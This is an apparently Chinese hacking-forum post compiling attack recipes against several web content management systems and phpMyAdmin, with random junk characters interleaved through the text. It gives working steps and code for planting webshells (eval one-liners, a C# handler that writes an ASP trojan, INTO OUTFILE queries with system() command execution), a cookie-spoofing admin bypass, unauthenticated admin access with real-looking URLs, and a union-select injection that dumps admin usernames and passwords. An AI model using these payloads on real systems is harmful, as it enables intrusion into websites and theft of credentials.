d, q% O# d4 G" N$ v3 P! L2 ^<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
9 y/ a4 h& ]* O5 P% e0 f+ P5 jUpload a new file:<br>, c# A' I1 @) x, O$ a$ c
<input type="file" name="NewFile" size="50"><br>8 ~5 R1 I2 q$ e6 m+ u! f2 e+ x6 o
<input id="btnUpload" type="submit" value="Upload">. N9 G k" n" x! Y
</form>
% v4 Q% Z8 K2 e0 n/ h' x-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ Y) L5 n2 ^2 O8 a& {$ {
0 f& F- s# s/ w' A2 R' V6 a9 jSDcms 后台拿webshell6 b( ?1 t7 x" Y! q" K( [% q3 g" f
) T5 x' _- n* a% V7 A: a3 a第一种方法:
( ` ^0 `# Q: j0 F' F5 k# |7 d# w进入后台-->系统管理-->系统设置-->系统设置->网站名称;* a y& C1 V* }2 A$ ^3 i
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx1 f6 W% J' M4 a! M
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
! L [4 ^+ @; F; A8 V# [4 D" T第二种方法:
0 A& b P: e5 j; a0 Q进入后台-->系统管理-->系统设置-->系统设置->上传设置;
6 x# Z' B# w1 F! z5 M9 D8 z9 x在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
B2 e3 j0 R3 q3 }3 @* L1 X第三种方法:9 `% l3 Q9 q# T. R
进入后台-->界面管理-->模板文件管理-->创建文件. ?- k+ e! ^! ^/ H7 |" ~- v
文件名写入getshell.ashx5 ?& u2 H- G T! e6 k" D
内容写入下面内容:2 y& l9 S! g# p9 H" j
/====================复制下面的=========================/8 u' ]- o: S& Z7 J5 E& t; b' `
<%@ WebHandler Language="C#" Class="Handler" %>
5 q! C* ?) \; j6 l4 Dusing System;8 F y2 v9 [. ^, c' ^: R* G
using System.Web;" `* S' w. t/ J
using System.IO;
( C) j5 q# w! U5 j6 g0 k+ \! v& cpublic class Handler : IHttpHandler {
' v1 l. G' R) e& F5 upublic void ProcessRequest (HttpContext context) {
, Q8 `) Q T' J( r* w. C' acontext.Response.ContentType = "text/plain";
2 z0 W6 Q* p% J |$ c4 qStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
|0 Z* h; x+ B. s" ]* Cfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
$ D! Q* X2 t5 Q" Kfile1.Flush();1 `- e: T5 Z& f2 {$ y
file1.Close();
, R4 x9 r6 D6 U# }3 Q3 U# w}1 v6 |6 R$ r% C
public bool IsReusable {) z. r1 P) ~4 K5 O7 |
get {/ j6 @! ^& }* g
return false;0 R5 O* G3 Q$ [# r% T8 D. {
}
2 f+ s5 A' L+ D( a* Q# C- d}
: Z, j/ N/ ?1 M/ i) `) O}) a$ e. U& b8 F1 ?
/=============================================/
1 ^: F& `8 @# O% z8 s访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
5 m2 r& k/ b; G会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接- G7 ]" M2 i' M
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------: {% U+ e1 v: @* P' F" R4 y
, u9 C* ~7 Q }- x4 J! u; V5 BESCMS网站管理系统0day! N t1 ?: t1 \' R# t% l
+ P0 [/ d: q/ [4 Y/ T3 P* }5 r后台登陆验证是通过admin/check.asp实现的
9 {) B: Q: F! i% X* |3 p4 R* z+ w+ l- V: y6 `% b
首先我们打开http://target.com/admin/es_index.html2 H6 R, N) j+ a" F% A% u9 {+ j% ~
然后在COOKIE结尾加上, t+ ]* H% x0 O( a0 O' C6 a9 X
; ESCMS$_SP2=ES_admin=st0p;5 O2 F$ E% w# m3 R* g/ m
修改,然后刷新
/ t R2 ^ t+ d+ [4 |7 ~进后台了嘎..
* O- ^3 ?5 P- ?0 ^; l+ M8 ]然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
, W& Z# F! O+ Y7 A6 E& ]5 v& _5 _" w' U
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
H) `! C8 n5 I" G5 g- G$ Q' S1 J嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp7 w9 L: J2 _7 n( t" F% \
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
/ b" ^' \8 i& [, E在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
5 _) Y9 Z/ @2 B------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: r0 ?, W6 J+ F$ |
( Y u. w( H# \宁志网站管理系统后台无验证漏洞及修复0 E$ ?: a9 G1 O# T% G
! O1 i6 z" e. o$ \
网上搜了一下,好像没有发布.如有雷同纯粹巧合!4 P1 S2 v$ K. V) t
官方网站:www.ningzhi.net/ h( P& V1 x* d* Y0 ^) S
学校网站管理系统 V.2011版本 + v* I# `( F9 D7 J1 d6 ?3 s
http://down.chinaz.com/soft/29943.htm % F2 {; T$ ]2 e* C* _5 h
其它版本(如:政府版等),自行下载.
' f! w% D! N2 q, Z! e5 f漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
5 w) [' @9 B' S# b9 W. x7 Klogin.asp代码如下:
# u4 l" q' Q) A8 E$ f; M8 _7 L<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 0 X3 N& R" F9 h3 ?
manage.asp代码我就不帖出来了.反正也没验证.
& \3 j- k( Z# }: O) a只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!) r4 P( R& Z9 e2 E) f I7 @
漏洞利用:4 G8 H2 a) l" J' ~% N6 r2 n
直接访问http://www.0855.tv/admin/manage.asp. z0 P8 I: f9 P: Z- O
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
) H. j2 W6 g4 P! p& ]2 n4 ~: P----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, ?, H2 I1 r4 K, t7 n
# ^5 b! |6 ?# m/ y$ ]5 o! aphpmyadmin拿shell的四种方法总结及修复
9 Z& N6 k0 ^8 i' x& p8 c$ n
& O6 ^; F3 n8 F方法一:
: Y' [ t# D$ T) m0 j# c9 YCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
8 J! W# I3 y# N+ O: H! UINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');& W0 A/ K% W! S! h! T
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
$ ]) o& [( e+ o1 n/ B0 k0 V8 s----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php# ?8 h5 j( H0 j
一句话连接密码:7on0 v: C+ G% f# T W% J- z
方法二:; [5 E" g, @4 T S/ c
读取文件内容: select load_file('E:/xamp/www/s.php');2 O, Z. S7 i" c# a
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php': e& j; _! v1 A' x2 {$ V) G
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'! y8 ]5 \: k7 L/ y" r( O* F, a
方法三:/ q# C0 q; c- l/ [/ W1 L
JhackJ版本 PHPmyadmin拿shell7 e, R( d5 ?" ?9 _! ^% C% z. r8 G
Create TABLE study (cmd text NOT NULL);$ Z5 u) g) y7 y. Z8 |
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');- P1 m! X9 H) t2 ~0 r
select cmd from study into outfile 'E:/wamp/www/7.php';( p6 r9 r3 C! @# V8 t
Drop TABLE IF EXISTS study;3 v# b1 e! y8 [, _- H0 ~$ f5 H
<?php eval($_POST[cmd])?>/ ?8 g- C; V* A- x2 F
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。& s" G2 H) \# p2 Z6 L1 ~7 O" E: n8 f; `
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
* F1 [, T% O) \6 oSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1% ^8 a& G& z$ S6 s
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
$ N* ]% t h. J+ G. l方法四:. z. |* ~7 y4 Y: b4 ?" l* u
select load_file('E:/xamp/www/study.php');
5 N9 s8 i V/ H1 [* Yselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
7 ~# [$ L2 B( }) F2 ^! U4 Z然后访问网站目录:http://www.2cto.com/study.php?cmd=dir8 I9 w8 \6 f6 q& x3 ^% J6 K
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------5 ^. I2 W+ d2 K" N$ L
$ J; q6 ]7 n! V! ANO.001中学网站管理系统 Build 110628 注入漏洞
9 N; v7 Z) q9 q# L, u/ A
# l+ t7 I- t; s) cNO.001中学网站管理系统功能模块:5 }, ^" U- i5 I; d; S( ~3 G! |% e
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等: i1 p/ U7 ?$ O# B4 b7 _
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息" v% U+ g l4 J8 w: ?9 t
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息) F. y2 V3 P) N( @3 ]3 M/ b
4.视频图片管理:一级分类,动态添加视频或者图片等信息
% h7 ~# Z# ]- E5 q8 f# I5.留言管理:对留言,修改,删除、回复等管理! [# u: M# @% q* Y: u
6.校友频道:包括校友资料excel导出、管理等功能/ ^. f: f$ d/ f- s2 W' n7 D; W
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
( e( a6 [; c+ L J! w: y1 _默认后台:admin/login.asp
2 W6 L/ r8 z. o' y. c# c官方演示:http://demo.001cms.net
0 @7 `% e) I3 P( t源码下载地址:http://down.chinaz.com/soft/30187.htm
) M+ W$ U% X: GEXP:: Z. f* j( t; D6 W3 j2 }# [
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
: n9 J4 P* e& h& Z+ M; x2 m0 B测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin. T! Q, J' Y3 O4 Z3 I
getshell:后台有备份,你懂的+ a1 V7 \% o g5 Y- e: c: |0 U5 q
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
& O5 k) V& c! `$ I: L. |------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对